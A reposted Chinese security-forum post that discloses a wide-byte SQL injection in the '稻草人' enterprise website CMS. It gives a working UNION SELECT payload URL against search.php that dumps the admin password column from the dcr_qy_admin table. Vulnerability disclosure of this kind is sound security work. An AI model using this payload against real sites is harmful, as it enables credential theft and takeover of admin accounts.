【漏洞】稻草人企业站管理系统宽字节注入

admin 2021年4月3日19:44:10评论90 views字数 431阅读1分26秒阅读模式

    By:毅心毅意

    大家好啊。。。我是新人。。希望大家多多关照……

    偶然在站长下载站下了一套企业建站程序,发现人气还蛮高的。

下载地址:

    http://down.chinaz.com/soft/26802.htm

    就去测试一下发现了一个宽字节注入漏洞

    http://127.0.0.1/search.php?k=10%d5'%20union%20select%201,password,3%20from%20dcr_qy_admin%23

    爆密码的效果如图:

【漏洞】稻草人企业站管理系统宽字节注入

    第一次在t00ls发帖..哈哈

文章来源于lcx.cc:【漏洞】稻草人企业站管理系统宽字节注入

相关推荐: 【视频】实拍武汉神奇水上公交惊涛骇浪

文章来源于lcx.cc:【视频】实拍武汉神奇水上公交惊涛骇浪相关推荐: 【技巧】使用批处理、Bat 查找指定名字的进程使用批处理、Bat查找指定名字的进程: echo off del /q /f /a tasklist.txt del /q /f /a fin…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:44:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞】稻草人企业站管理系统宽字节注入http://cn-sec.com/archives/324657.html

发表评论

匿名网友 填写信息